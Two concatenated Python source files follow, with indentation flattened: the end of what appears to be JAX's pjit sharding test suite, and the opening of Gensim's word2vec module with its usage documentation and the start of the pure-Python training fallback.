self.assertLen(actual.device_buffers, 2)
self.assertAllClose(actual.device_buffers[0].to_py(), expected,
check_dtypes=False)
hlo = jax.xla_computation(f)(np.ones(shape))
# Annotation from with_sharding_constraint
self.assertIn("sharding={devices=[2,1]0,1}", hlo.as_hlo_text())
# Annotation from pjit
self.assertIn("sharding={replicated}", hlo.as_hlo_text())
@jtu.with_mesh([('x', 2), ('y', 1)])
def testShardingConstraintPyTree(self):
@partial(pjit, in_axis_resources=None, out_axis_resources=None)
def f(x):
x = with_sharding_constraint(x, [P('x', 'y'), P('y', 'x')])
x = x.copy()
x[0]["a"] *= 2
return x
shape = (8, 8)
v = np.arange(prod(shape)).reshape(shape)
x = [{"a": v, "b": v * 2}, v * 3]
actual = f(x)
expected = x.copy()
expected[0]["a"] *= 2
self.assertAllClose(actual, expected, check_dtypes=False)
self.assertLen(actual[0]["a"].device_buffers, 2)
hlo = jax.xla_computation(f)(x)
# Annotations from with_sharding_constraint
self.assertIn("sharding={devices=[2,1]0,1}", hlo.as_hlo_text())
self.assertIn("sharding={devices=[1,2]0,1}", hlo.as_hlo_text())
# Annotation from pjit
self.assertIn("sharding={replicated}", hlo.as_hlo_text())
def testCaching(self):
def f(x):
assert should_be_tracing
return jnp.sin(x) * 2
x = np.arange(16).reshape(4, 4)
devices = np.array(list(jax.local_devices())[:4])
if devices.size < 4:
raise unittest.SkipTest("Test requires 4 devices")
devices = devices.reshape((2, 2))
with mesh(devices, ('x', 'y')):
should_be_tracing = True
pjit(f, in_axis_resources=P(('x', 'y')), out_axis_resources=None)(x)
should_be_tracing = False
pjit(f, in_axis_resources=P(('x', 'y')), out_axis_resources=None)(x)
# Re-create the mesh to make sure that has no influence on caching
with mesh(devices, ('x', 'y')):
should_be_tracing = False
pjit(f, in_axis_resources=P(('x', 'y')), out_axis_resources=None)(x)
@jtu.with_mesh([('x', 2), ('y', 1)])
def testNested(self):
# Add a constant captured by the nested pjit to make things more complicated
h = jnp.arange(4)
f = pjit(lambda x: x.sum() + h.sum(), in_axis_resources=P('x', 'y'), out_axis_resources=None)
g = pjit(lambda x: f(jnp.sin(x)), in_axis_resources=P('x', None), out_axis_resources=None)
x = jnp.arange(16).reshape((4, 4))
y = g(x)
self.assertAllClose(y, jnp.sin(x).sum() + h.sum())
self.assertTrue(hasattr(y, "sharding_spec"))
@check_1d_2d_mesh(set_mesh=True)
@unittest.skipIf(jax._src.lib.version < (0, 1, 72), "Needs jaxlib 0.1.72+")
def testAutodiff(self, mesh, resources):
if len(mesh) != 2: return
assert resources == ('x', 'y')
# Add a constant captured by the nested pjit to make things more complicated
h = jnp.arange(4)
f = pjit(lambda x: x.sum(1) * h.sum(),
in_axis_resources=P('x', 'y'), out_axis_resources=P(('x', 'y')))
g = pjit(lambda x: f(jnp.sin(x * 4 + 2)),
in_axis_resources=P('x', None), out_axis_resources=P(('x', 'y')))
jtu.check_grads(g, (jnp.arange(16, dtype=jnp.float32).reshape((4, 4)) / 100,),
order=2)
@jtu.with_mesh([('x', 2), ('y', 1)])
def testEvalJaxpr(self):
x, y = jnp.arange(4), jnp.arange(5)
f = pjit(lambda x, y: x.sum() + jnp.sin(y),
in_axis_resources=(P('x'), P('y')),
out_axis_resources=P('y'))
f_jaxpr = jax.make_jaxpr(f)(x, y)
f_eval = jax.core.jaxpr_as_fun(f_jaxpr)
r, = f_eval(x, y)
self.assertAllClose(r, x.sum() + jnp.sin(y))
@jtu.with_mesh([('x', 2)])
def testNonArrayArg(self):
self.assertEqual(pjit(lambda x: x + 2,
in_axis_resources=None,
out_axis_resources=None)(1), 3)
@jtu.with_mesh([('x', 2)])
def testNonHashableAxisResources(self):
x = jnp.arange(4)
y = pjit(lambda x: {'b': x['a'] + 2},
in_axis_resources=({'a': P('x')},),
out_axis_resources={'b': P('x')})({'a': x})
self.assertAllClose(y, {'b': x + 2})
@jtu.with_mesh([('x', 2)])
def testGradOfConstraint(self):
# Make sure that we can compute grads through sharding constraints
h = lambda x: jnp.sin(with_sharding_constraint(x, P('x'))).sum()
f = pjit(lambda x: jax.grad(h)(x),
in_axis_resources=None, out_axis_resources=None)
x = jnp.arange(8, dtype=jnp.float32)
self.assertAllClose(f(x), jnp.cos(x))
@jtu.with_mesh([('x', 2)])
def testNoopPartitionSpecs(self):
noops = [P(), P(None), P(()), P((), None), P(None, None, ())]
x = jnp.arange(8).reshape((2, 2, 2))
for spec in noops:
y = pjit(lambda x: x * 2, in_axis_resources=spec, out_axis_resources=spec)(x)
self.assertAllClose(y, x * 2)
@jtu.with_mesh([('x', 2)])
def testVmapModifiesAxisResources(self):
h = pjit(lambda x, y: (x + y, x, y), in_axis_resources=P('x'), out_axis_resources=None)
x = jnp.arange(4)
y = jnp.arange(5*4).reshape((5, 4))
jaxpr = jax.make_jaxpr(jax.vmap(h, in_axes=(None, 0)))(x, y).jaxpr
eqn = jaxpr.eqns[0]
self.assertIs(eqn.primitive, pjit_p)
x_sync, y_sync = (spec.sync for spec in eqn.params['in_axis_resources'])
self.assertEqual(x_sync, SpecSync.IN_SYNC)
self.assertEqual(y_sync, SpecSync.DIM_PERMUTE)
x_sync, y_sync, z_sync = (spec.sync for spec in eqn.params['out_axis_resources'])
self.assertEqual(x_sync, SpecSync.DIM_PERMUTE)
self.assertEqual(y_sync, SpecSync.IN_SYNC)
self.assertEqual(z_sync, SpecSync.DIM_PERMUTE)
@jtu.with_mesh([('x', 2)])
def testVMap(self):
f = pjit(lambda x, y: (x + y, x), in_axis_resources=P('x'), out_axis_resources=P('x'))
x = jnp.arange(4)
y = jnp.arange(5*4).reshape((5, 4))
z, w = jax.vmap(f, in_axes=(None, 0), out_axes=(0, None))(x, y)
self.assertAllClose(z, x + y)
self.assertAllClose(w, x)
self.assertEqual(z.sharding_spec.sharding, (pxla.NoSharding(), pxla.Chunked([2])))
self.assertEqual(w.sharding_spec.sharding, (pxla.Chunked([2]),))
@jtu.with_mesh([('x', 2)])
def testVMapShardingConstraint(self):
f = pjit(lambda x: with_sharding_constraint(x, P('x')),
in_axis_resources=P(), out_axis_resources=P('x'))
x = jnp.arange(5*4).reshape((5, 4))
jaxpr = jax.make_jaxpr(jax.vmap(f))(x)
pjit_eqn, = jaxpr.eqns
constraint_eqn, = pjit_eqn.params['jaxpr'].eqns
self.assertEqual(constraint_eqn.params['axis_resources'].partitions, ((), ('x',)))
self.assertEqual(constraint_eqn.params['axis_resources'].sync, SpecSync.DIM_PERMUTE)
@jtu.with_mesh([('x', 2), ('y', 1)])
def testShardingInXMap(self):
h = pjit(lambda x: x, in_axis_resources=P('x'), out_axis_resources=None)
f = xmap(lambda x: h(x * 2), in_axes=['i', ...], out_axes=['i', ...],
axis_resources={'i': 'y'})
x = jnp.arange(16).reshape((4, 4))
rule = xla._translations[pjit_p]
test_rule_called = False
def _test_rule(*args, **kwargs):
nonlocal test_rule_called
test_rule_called = True
in_axis_resources = kwargs['in_axis_resources']
self.assertEqual(len(in_axis_resources), 1)
self.assertIn(('y',), in_axis_resources[0].partitions)
return rule(*args, **kwargs)
try:
xla._translations[pjit_p] = _test_rule
f(x)
self.assertTrue(test_rule_called)
finally:
xla._translations[pjit_p] = rule
@jtu.with_mesh([('x', 2)])
def testLowerWithAbstractArgs(self):
x = jax.ShapeDtypeStruct((2, 2), jnp.float32)
# Make sure this doesn't crash
pjit(lambda x: x + 4, in_axis_resources=P('x'), out_axis_resources=P('x')).lower(x)
def testInfeed(self):
devices = np.array(jax.local_devices())
nr_devices = len(devices)
shape = (nr_devices * 3, nr_devices * 5)
def f_for_jit(x):
token = lax.create_token(x)
(y,), token = lax.infeed(
token, shape=(jax.ShapedArray(x.shape, np.float32),))
(z,), token = lax.infeed(
token, shape=(jax.ShapedArray(x.shape, np.float32),))
(w,), token = lax.infeed(
token, shape=(jax.ShapedArray(x.shape, np.float32),))
return x + y + z + w
x = np.arange(np.prod(shape), dtype=np.float32).reshape(shape)
y = x * 2.
z = x * 3.
w = x * 4.
# Transfer data to infeed before executing the function. For GPUs, the
# execution of the compiled function is blocking, so transferring data
# to infeed before executing ensures that the execution does not deadlock
# waiting for the infeed data.
    logging.info('Transferring to infeed for the jit call')
d = devices[0]
d.transfer_to_infeed((y,))
d.transfer_to_infeed((z,))
d.transfer_to_infeed((w,))
# JIT
logging.info('Making jit call')
res0 = jax.jit(f_for_jit)(x)
self.assertAllClose(res0, x + y + z + w, check_dtypes=True)
# PJIT
def f_for_pjit(x):
token = lax.create_token(x)
# A replicated infeed
(y,), token = lax.infeed(
token,
shape=(jax.ShapedArray(x.shape, np.float32),),
partitions=(None,))
# An infeed sharded on first axis
(z,), token = lax.infeed(
token,
shape=(jax.ShapedArray(x.shape, np.float32),),
partitions=(P(nr_devices, 1),))
# An infeed sharded on second axis
(w,), token = lax.infeed(
token,
shape=(jax.ShapedArray(x.shape, np.float32),),
partitions=(P(1, nr_devices),))
return x + y + z + w
    logging.info('Transferring to infeed for the pjit call')
for didx, d in enumerate(devices):
# Transfer the whole array to all devices for replicated.
d.transfer_to_infeed((y,))
# For sharded infeed, transfer only the needed slices to each device.
      d.transfer_to_infeed((z[3 * didx:3 * didx + 3, :],))
d.transfer_to_infeed((w[:, 5 * didx:5 * didx + 5],))
with mesh(devices, ['d']):
logging.info('Making pjit call')
res = pjit(
f_for_pjit, in_axis_resources=(P('d'),), out_axis_resources=P('d'))(
x)
self.assertAllClose(res0, res, check_dtypes=True)
def testOutfeed(self):
devices = np.array(jax.local_devices())
nr_devices = len(devices)
shape = (nr_devices * 3, nr_devices * 5)
def f(x):
token = lax.create_token(x)
token = lax.outfeed(token, x, partitions=(None,))
token = lax.outfeed(token, x, partitions=(P(nr_devices, 1),))
token = lax.outfeed(token, x, partitions=(P(1, nr_devices),))
return x
x = np.arange(np.prod(shape), dtype=np.float32).reshape(shape)
def dispatch():
with mesh(devices, ['d']):
logging.info('Making pjit call')
pjit(f, in_axis_resources=(P('d'),), out_axis_resources=P('d'))(x)
execution = threading.Thread(target=dispatch)
execution.start()
def check_outfeed(d, x):
y, = d.transfer_from_outfeed(
xla_client.shape_from_pyval((x,)).with_major_to_minor_layout_if_absent())
self.assertAllClose(x, y, check_dtypes=True)
    logging.info('Transferring from outfeed for the pjit call')
for didx, d in enumerate(devices):
# Transfer the whole array from all devices for replicated.
check_outfeed(d, x)
# For sharded outfeed, the results are sliced.
check_outfeed(d, x[3 * didx:3 * didx + 3, :])
check_outfeed(d, x[:, 5 * didx:5 * didx + 5])
execution.join()
@jtu.with_mesh([('x', 2)])
def testWithCustomPRNGKey(self):
if not config.jax_enable_custom_prng:
raise unittest.SkipTest("test requires jax_enable_custom_prng")
key = jax.prng.seed_with_impl(jax.prng.rbg_prng_impl, 87)
# Make sure this doesn't crash
pjit(lambda x: x, in_axis_resources=(None), out_axis_resources=(None))(key)
@jtu.with_mesh([('x', 2), ('y', 2)])
def testLowerCompile(self):
@partial(pjit,
in_axis_resources=P(('x', 'y'),),
out_axis_resources=P(('x', 'y'),))
def f(x, y):
return x @ y
shape = (8, 8)
x = jnp.arange(np.prod(shape)).reshape(shape)
expected = x @ (x + 1)
exe = f.lower(x, x + 1).compile()
actual = exe(x, x + 1)
splits = np.split(expected, 4)
self.assertAllClose(actual.device_buffers[0].to_py(), splits[0],
check_dtypes=False)
self.assertAllClose(actual.device_buffers[1].to_py(), splits[1],
check_dtypes=False)
self.assertAllClose(actual.device_buffers[2].to_py(), splits[2],
check_dtypes=False)
self.assertAllClose(actual.device_buffers[3].to_py(), splits[3],
check_dtypes=False)
@jtu.with_mesh([('x', 2), ('y', 2)])
def testLowerCompileWithKwargs(self):
@partial(pjit,
in_axis_resources=P(('x', 'y'),),
out_axis_resources=P(('x', 'y'),))
def f(x, y, **kwargs):
return x @ y
shape = (8, 8)
x = jnp.arange(np.prod(shape)).reshape(shape)
exe = f.lower(x, x + 1).compile()
self.assertRaisesRegex(
NotImplementedError,
"function was compiled by a transformation that does not support "
"keyword arguments, but called with keyword arguments: a, b",
lambda: exe(x, x + 1, a=1, b=2))
@jtu.with_mesh([('x', 2), ('y', 2)])
def testLowerCompileInTreeMismatch(self):
@partial(pjit,
in_axis_resources=P(('x', 'y'),),
out_axis_resources=P(('x', 'y'),))
def f(x, y):
return x @ y
shape = (8, 8)
x = jnp.arange(np.prod(shape)).reshape(shape)
exe = f.lower(x, x + 1).compile()
self.assertRaisesRegex(
TypeError, "function compiled for .*, called with .*",
lambda: exe([x], [x + 1]))
@jtu.with_mesh([('x', 2), ('y', 2)])
def testLowerCompileArgTypeMismatch(self):
@partial(pjit,
in_axis_resources=P(('x', 'y'),),
out_axis_resources=P(('x', 'y'),))
def f(x, y):
return x @ y
shape = (8, 8)
x = jnp.arange(np.prod(shape)).reshape(shape)
x_f32 = x.astype(jnp.float32)
x_i32 = x.astype(jnp.int32)
exe = f.lower(x_f32, x_f32).compile()
self.assertRaisesRegex(
TypeError,
"Computation compiled for input types:\n.*float32.*\n"
"called with:\n.*int32.*",
lambda: exe(x_i32, x_i32))
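# Escape the parentheses in a PartitionSpec's repr so it can be embedded verbatim
# in the assertRaisesRegex patterns used by the error tests below.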
def spec_regex(s):
return str(s).replace(r"(", r"\(").replace(r")", r"\)")
class PJitErrorTest(jtu.JaxTestCase):
@check_1d_2d_mesh(set_mesh=True)
def testNonDivisibleArgs(self, mesh, resources):
x = jnp.ones((3, 2))
spec = P(resources, None)
mesh_size = str(np.prod([dim[1] for dim in mesh], dtype=np.int64))
with self.assertRaisesRegex(ValueError,
r"One of pjit arguments.*" + spec_regex(spec) + r".*"
r"implies that the size of its dimension 0 should be "
r"divisible by " + mesh_size + r", but it is equal to 3"):
pjit(lambda x: x, in_axis_resources=spec, out_axis_resources=None)(x)
@check_1d_2d_mesh(set_mesh=True)
def testNonDivisibleOuts(self, mesh, resources):
x = jnp.ones((3, 2))
spec = P(resources, None)
mesh_size = str(np.prod([dim[1] for dim in mesh], dtype=np.int64))
with self.assertRaisesRegex(ValueError,
r"One of pjit outputs.*" + spec_regex(spec) + r".*"
r"implies that the size of its dimension 0 should be "
r"divisible by " + mesh_size + r", but it is equal to 3"):
pjit(lambda x: x, in_axis_resources=None, out_axis_resources=P(resources, None))(x)
@check_1d_2d_mesh(set_mesh=True)
def testNonDivisibleConstraint(self, mesh, resources):
x = jnp.ones((3, 2))
spec = P(resources,)
mesh_size = str(np.prod([dim[1] for dim in mesh], dtype=np.int64))
with self.assertRaisesRegex(ValueError,
r"One of with_sharding_constraint arguments"
r".*" + spec_regex(spec) + r".*implies that the size of "
r"its dimension 0 should be divisible by " + mesh_size +
r", but it is equal to 3"):
pjit(lambda x: with_sharding_constraint(x, spec),
in_axis_resources=None, out_axis_resources=None)(x)
@check_1d_2d_mesh(set_mesh=False)
@jtu.with_mesh([('z', 1)])
def testUndefinedResourcesArgs(self, mesh, resources):
x = jnp.ones((2, 2))
spec = P(resources,)
with self.assertRaisesRegex(ValueError,
r"One of pjit arguments.*" + spec_regex(spec) + r", "
r"but resource axis x is undefined."):
pjit(lambda x: x, in_axis_resources=spec, out_axis_resources=None)(x)
@check_1d_2d_mesh(set_mesh=False)
@jtu.with_mesh([('z', 1)])
def testUndefinedResourcesOuts(self, mesh, resources):
x = jnp.ones((2, 2))
spec = P(resources,)
with self.assertRaisesRegex(ValueError,
r"One of pjit outputs.*" + spec_regex(spec) + r", "
r"but resource axis x is undefined."):
pjit(lambda x: x, in_axis_resources=None, out_axis_resources=spec)(x)
@check_1d_2d_mesh(set_mesh=False)
@jtu.with_mesh([('z', 1)])
def testUndefinedResourcesConstraint(self, mesh, resources):
x = jnp.ones((2, 2))
spec = P(resources,)
with self.assertRaisesRegex(ValueError,
r"One of with_sharding_constraint arguments"
r".*" + spec_regex(spec) + r", but resource axis "
r"x is undefined."):
pjit(lambda x: with_sharding_constraint(x, spec),
in_axis_resources=None, out_axis_resources=None)(x)
@jtu.with_mesh([('x', 2), ('y', 1)])
def testRankTooLowArgs(self):
x = jnp.arange(2)
spec = P('x', 'y')
error = (r"One of pjit arguments.*" + spec_regex(spec) + r", which implies "
r"that it has a rank of at least 2, but it is 1")
with self.assertRaisesRegex(ValueError, error):
pjit(lambda x: x.sum(), in_axis_resources=spec, out_axis_resources=None)(x)
@jtu.with_mesh([('x', 2), ('y', 1)])
def testRankTooLowOuts(self):
x = jnp.arange(2)
spec = P('x', 'y')
error = (r"One of pjit outputs.*" + spec_regex(spec) + r", which implies "
r"that it has a rank of at least 2, but it is 0")
with self.assertRaisesRegex(ValueError, error):
pjit(lambda x: x.sum(), in_axis_resources=None, out_axis_resources=spec)(x)
@jtu.with_mesh([('x', 2), ('y', 1)])
def testRankTooLowConstraint(self):
x = jnp.arange(2)
spec = P('x', 'y')
error = (r"One of with_sharding_constraint arguments " +
r"was given.*" + spec_regex(spec) + r", which implies "
r"that it has a rank of at least 2, but it is 1")
with self.assertRaisesRegex(ValueError, error):
pjit(lambda x: with_sharding_constraint(x, spec),
in_axis_resources=None, out_axis_resources=None)(x)
@jtu.with_mesh([('x', 2), ('y', 1)])
def testRepeatedInResources(self):
x = jnp.arange(2)
for spec in [P('x', 'x'), P('x', ('y', 'x'))]:
error = (r"A single in_axis_resources specification can map every mesh "
r"axis to at most one positional dimension, but " +
spec_regex(spec) + " has duplicate entries for `x`")
with self.assertRaisesRegex(ValueError, error):
pjit(lambda x: x, in_axis_resources=spec, out_axis_resources=None)(x)
@jtu.with_mesh([('x', 2), ('y', 1)])
def testRepeatedOutResources(self):
x = jnp.arange(2)
for spec in [P('x', 'x'), P('x', ('y', 'x'))]:
error = (r"A single out_axis_resources specification can map every mesh "
r"axis to at most one positional dimension, but " +
spec_regex(spec) + " has duplicate entries for `x`")
with self.assertRaisesRegex(ValueError, error):
pjit(lambda x: x, in_axis_resources=None, out_axis_resources=spec)(x)
@jtu.with_mesh([('x', 2)])
def testInputShardsXMapAxis(self):
spec = P('x')
f = xmap(pjit(lambda x: x + 2, in_axis_resources=spec, out_axis_resources=None),
in_axes=['i', ...], out_axes=['i', ...], axis_resources={'i': 'x'})
x = jnp.arange(4).reshape((2, 2))
error = (r"pjit input has an axis resources specification of " +
spec_regex(spec) + r" that uses one or more mesh axes already used by "
r"xmap to partition a named axis appearing in its named_shape \(both "
r"use mesh axes `x`\)")
with self.assertRaisesRegex(JAXTypeError, error):
f(x)
@jtu.with_mesh([('x', 2)])
def testOutputShardsXMapAxis(self):
spec = P('x')
f = xmap(pjit(lambda x: x + 2, in_axis_resources=None, out_axis_resources=spec),
in_axes=['i', ...], out_axes=['i', ...], axis_resources={'i': 'x'})
x = jnp.arange(4).reshape((2, 2))
error = (r"pjit output has an axis resources specification of " +
spec_regex(spec) + r" that uses one or more mesh axes already used by "
r"xmap to partition a named axis appearing in its named_shape \(both "
r"use mesh axes `x`\)")
with self.assertRaisesRegex(JAXTypeError, error):
f(x)
@jtu.with_mesh([('x', 2)])
def testConstraintShardsXMapAxis(self):
spec = P('x')
f = xmap(lambda x: with_sharding_constraint(x, axis_resources=spec),
in_axes=['i', ...], out_axes=['i', ...], axis_resources={'i': 'x'})
x = jnp.arange(4).reshape((2, 2))
error = (r"with_sharding_constraint input has an axis resources specification of " +
spec_regex(spec) + r" that uses one or more mesh axes already used by "
r"xmap to partition a named axis appearing in its named_shape \(both "
r"use mesh axes `x`\)")
with self.assertRaisesRegex(JAXTypeError, error):
f(x)
@jtu.with_mesh([('x', 2)])
def testCatchesInnerXMapErrors(self):
f = pjit(xmap(lambda x, y: x, in_axes=(['i'], ['j']), out_axes=['i', 'j'],
axis_resources={'i': 'x', 'j': 'x'}),
in_axis_resources=None, out_axis_resources=None)
x = jnp.arange(4)
with self.assertRaises(JAXTypeError):
f(x, x)
def testEmptyMesh(self):
error = (r"pjit requires a non-empty mesh! Are you sure that it's defined "
r"at the call site?")
with self.assertRaisesRegex(RuntimeError, error):
pjit(lambda x: x, in_axis_resources=None, out_axis_resources=None)(jnp.arange(4))
@jtu.with_mesh([('x', 2)])
def testAxisResourcesMismatch(self):
x = jnp.ones([])
p = [None, None, None]
pjit(lambda x: x, (p,), p)([x, x, x]) # OK
error = re.escape(
r"pjit in_axis_resources specification must be a tree prefix of the "
r"corresponding value, got specification (None, None, None) for value "
r"tree PyTreeDef((*, *)). Note that pjit in_axis_resources that are "
r"non-trivial pytrees should always be wrapped in a tuple representing "
r"the argument list.")
with self.assertRaisesRegex(ValueError, error):
pjit(lambda x, y: x, p, p)(x, x) # Error, but make sure we hint at tupling
# TODO(apaszke): Disable implicit list casts and enable this
# error = re.escape(
# r"pjit in_axis_resources specification must be a tree prefix of the "
# r"corresponding value, got specification (None, None, None) for value "
# r"tree PyTreeDef(([*, *, *],)). Note that pjit in_axis_resources that "
# r"are non-trivial pytrees should always be wrapped in a tuple representing "
# r"the argument list. In particular, you're passing in a single argument "
# r"which means that pjit in_axis_resources might need to be wrapped in a "
# r"singleton tuple.")
# with self.assertRaisesRegex(ValueError, error):
# pjit(lambda x: x, p, p)([x, x, x]) # Error, but make sure we hint at singleton tuple
error = re.escape(
r"pjit out_axis_resources specification must be a tree prefix of the "
r"corresponding value, got specification [[None, None, None], None] for "
r"value tree PyTreeDef([*, *, *]).")
with self.assertRaisesRegex(ValueError, error):
pjit(lambda x: x, (p,), [p, None])([x, x, x]) # Error, we raise a generic tree mismatch message
@jtu.with_mesh([('x', 2)])
def testNestedDifferentResources(self):
@partial(pjit, in_axis_resources=P('x'), out_axis_resources=None)
def f(x):
with mesh(np.array([jax.local_devices()[0]]), ('x')):
@partial(pjit, in_axis_resources=P('x'), out_axis_resources=None)
def h(x):
return x
return h(x)
xshape = (2, 5, 6)
x = jnp.arange(np.prod(xshape)).reshape(xshape)
with self.assertRaisesRegex(RuntimeError,
"Changing the physical mesh is not allowed.*"):
f(x)
class UtilTest(jtu.JaxTestCase):
def testOpShardingRoundTrip(self):
FakeDevice = namedtuple('FakeDevice', ['id'])
mesh_named_shape = OrderedDict([('a', 2), ('b', 3), ('c', 4), ('d', 7), ('e', 4)])
mesh_axes, mesh_shape = unzip2(mesh_named_shape.items())
devices = [FakeDevice(i) for i in range(np.prod(list(mesh_shape)))]
mesh = pxla.Mesh(np.array(devices).reshape(*mesh_shape), tuple(mesh_axes))
dims = 5
aval = jax.core.ShapedArray((len(devices),) * dims, jnp.float32)
def roundtrip(spec):
op_sharding = pjit_lib.get_aval_sharding_proto(aval, spec, mesh)
parsed_spec = pjit_lib.parse_op_sharding(op_sharding, mesh).partitions
self.assertEqual(parsed_spec[:len(spec)], spec)
self.assertEqual(parsed_spec[len(spec):], ((),) * (len(parsed_spec) - len(spec)))
special_specs = [P()]
for spec in special_specs:
roundtrip(spec)
rng = np.random.default_rng(1)
for i in range(100):
spec = [()] * dims
for axis in rng.permutation(mesh_axes)[:rng.integers(low=1, high=len(mesh_axes) + 1)]:
spec[rng.choice(dims)] += (axis,)
roundtrip(P(*spec))
if __name__ == '__main__':
absltest.main(testLoader=jtu.JaxTestLoader())
word2vec.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Author: Shiva Manne <manneshiva@gmail.com>
# Copyright (C) 2018 RaRe Technologies s.r.o.
# Licensed under the GNU LGPL v2.1 - http://www.gnu.org/licenses/lgpl.html
"""This module implements the word2vec family of algorithms, using highly optimized C routines,
data streaming and Pythonic interfaces.
The word2vec algorithms include skip-gram and CBOW models, using either
hierarchical softmax or negative sampling: `Tomas Mikolov et al: Efficient Estimation of Word Representations
in Vector Space <https://arxiv.org/pdf/1301.3781.pdf>`_, `Tomas Mikolov et al: Distributed Representations of Words
and Phrases and their Compositionality <https://arxiv.org/abs/1310.4546>`_.
Other embeddings
================
There are more ways to train word vectors in Gensim than just Word2Vec.
See also :class:`~gensim.models.doc2vec.Doc2Vec`, :class:`~gensim.models.fasttext.FastText` and
wrappers for :class:`~gensim.models.wrappers.VarEmbed` and :class:`~gensim.models.wrappers.WordRank`.
The training algorithms were originally ported from the C package https://code.google.com/p/word2vec/
and extended with additional functionality and optimizations over the years.
For a tutorial on Gensim word2vec, with an interactive web app trained on GoogleNews,
visit https://rare-technologies.com/word2vec-tutorial/.
**Make sure you have a C compiler before installing Gensim, to use the optimized word2vec routines**
(70x speedup compared to plain NumPy implementation, https://rare-technologies.com/parallelizing-word2vec-in-python/).
Usage examples
==============
Initialize a model with e.g.:
.. sourcecode:: pycon
>>> from gensim.test.utils import common_texts, get_tmpfile
>>> from gensim.models import Word2Vec
>>>
>>> path = get_tmpfile("word2vec.model")
>>>
>>> model = Word2Vec(common_texts, size=100, window=5, min_count=1, workers=4)
>>> model.save("word2vec.model")
The training is streamed, meaning `sentences` can be a generator, reading input data
from disk on-the-fly, without loading the entire corpus into RAM.
It also means you can continue training the model later:
.. sourcecode:: pycon
>>> model = Word2Vec.load("word2vec.model")
>>> model.train([["hello", "world"]], total_examples=1, epochs=1)
(0, 2)
The trained word vectors are stored in a :class:`~gensim.models.keyedvectors.KeyedVectors` instance in `model.wv`:
.. sourcecode:: pycon
>>> vector = model.wv['computer'] # numpy vector of a word
The reason for separating the trained vectors into `KeyedVectors` is that if you don't
need the full model state any more (don't need to continue training), the state can be discarded,
resulting in a much smaller and faster object that can be mmapped for lightning
fast loading and sharing the vectors in RAM between processes:
.. sourcecode:: pycon
>>> from gensim.models import KeyedVectors
>>>
>>> path = get_tmpfile("wordvectors.kv")
>>>
>>> model.wv.save(path)
>>> wv = KeyedVectors.load(path, mmap='r')
>>> vector = wv['computer'] # numpy vector of a word
Gensim can also load word vectors in the "word2vec C format", as a
:class:`~gensim.models.keyedvectors.KeyedVectors` instance:
.. sourcecode:: pycon
>>> from gensim.test.utils import datapath
>>>
>>> wv_from_text = KeyedVectors.load_word2vec_format(datapath('word2vec_pre_kv_c'), binary=False) # C text format
>>> wv_from_bin = KeyedVectors.load_word2vec_format(datapath("euclidean_vectors.bin"), binary=True) # C bin format
It is impossible to continue training the vectors loaded from the C format because the hidden weights,
vocabulary frequencies and the binary tree are missing. To continue training, you'll need the
full :class:`~gensim.models.word2vec.Word2Vec` object state, as stored by :meth:`~gensim.models.word2vec.Word2Vec.save`,
not just the :class:`~gensim.models.keyedvectors.KeyedVectors`.
You can perform various NLP word tasks with a trained model. Some of them
are already built-in - you can see it in :mod:`gensim.models.keyedvectors`.
If you're finished training a model (i.e. no more updates, only querying),
you can switch to the :class:`~gensim.models.keyedvectors.KeyedVectors` instance:
.. sourcecode:: pycon
>>> word_vectors = model.wv
>>> del model
to trim unneeded model state: this uses much less RAM and allows fast loading and memory sharing (mmap).
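Typical word tasks then go straight through the `KeyedVectors` instance, for example (a minimal sketch; any in-vocabulary word works):
.. sourcecode:: pycon
>>> similar = word_vectors.most_similar('computer', topn=3)  # list of (word, cosine similarity) pairs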
Note that there is a :mod:`gensim.models.phrases` module which lets you automatically
detect phrases longer than one word. Using phrases, you can learn a word2vec model
where "words" are actually multiword expressions, such as `new_york_times` or `financial_crisis`:
.. sourcecode:: pycon
>>> from gensim.test.utils import common_texts
>>> from gensim.models import Phrases
>>>
>>> bigram_transformer = Phrases(common_texts)
>>> model = Word2Vec(bigram_transformer[common_texts], min_count=1)
"""
from __future__ import division # py3 "true division"
import logging
import sys
import os
import heapq
from timeit import default_timer
from copy import deepcopy
from collections import defaultdict
import threading
import itertools
import warnings
from gensim.utils import keep_vocab_item, call_on_class_only
from gensim.models.keyedvectors import Vocab, Word2VecKeyedVectors
from gensim.models.base_any2vec import BaseWordEmbeddingsModel
try:
from queue import Queue, Empty
except ImportError:
from Queue import Queue, Empty
from numpy import exp, dot, zeros, random, dtype, float32 as REAL,\
uint32, seterr, array, uint8, vstack, fromstring, sqrt,\
empty, sum as np_sum, ones, logaddexp, log, outer
from scipy.special import expit
from gensim import utils, matutils # utility fnc for pickling, common scipy operations etc
from gensim.utils import deprecated
from six import iteritems, itervalues, string_types
from six.moves import range
logger = logging.getLogger(__name__)
try:
from gensim.models.word2vec_inner import train_batch_sg, train_batch_cbow
from gensim.models.word2vec_inner import score_sentence_sg, score_sentence_cbow
from gensim.models.word2vec_inner import FAST_VERSION, MAX_WORDS_IN_BATCH
except ImportError:
# failed... fall back to plain numpy (20-80x slower training than the above)
FAST_VERSION = -1
MAX_WORDS_IN_BATCH = 10000
def train_batch_sg(model, sentences, alpha, work=None, compute_loss=False):
"""Update skip-gram model by training on a sequence of sentences.
Called internally from :meth:`~gensim.models.word2vec.Word2Vec.train`.
Warnings
--------
This is the non-optimized, pure Python version. If you have a C compiler, Gensim
will use an optimized code path from :mod:`gensim.models.word2vec_inner` instead.
Parameters
----------
model : :class:`~gensim.models.word2Vec.Word2Vec`
The Word2Vec model instance to train.
sentences : iterable of list of str
The corpus used to train the model.
alpha : float
The learning rate.
work : object, optional
Unused.
compute_loss : bool, optional
Whether or not the training loss should be computed in this batch.
Returns
-------
int
Number of words in the vocabulary actually used for training (words that were in the vocabulary
and were not discarded by frequent-word downsampling, i.e. the `sample` parameter).
"""
result = 0
for sentence in sentences:
word_vocabs = [model.wv.vocab[w] for w in sentence if w in model.wv.vocab
and model.wv.vocab[w].sample_int > model.random.rand() * 2 ** 32]
for pos, word in enumerate(word_vocabs):
reduced_window = model.random.randint(model.window) # `b` in the original word2vec code
# now go over all words from the (reduced) window, predicting each one in turn
start = max(0, pos - model.window + reduced_window)
for pos2, word2 in enumerate(word_vocabs[start:(pos + model.window + 1 - reduced_window)], start):
# don't train on the `word` itself
if pos2 != pos:
train_sg_pair(
model, model.wv.index2word[word.index], word2.index, alpha, compute_loss=compute_loss
)
result += len(word_vocabs)
return result
def train_batch_cbow(model, sentences, alpha, work=None, neu1=None, compute_loss=False):
"""Update CBOW model by training on a sequence of sentences.
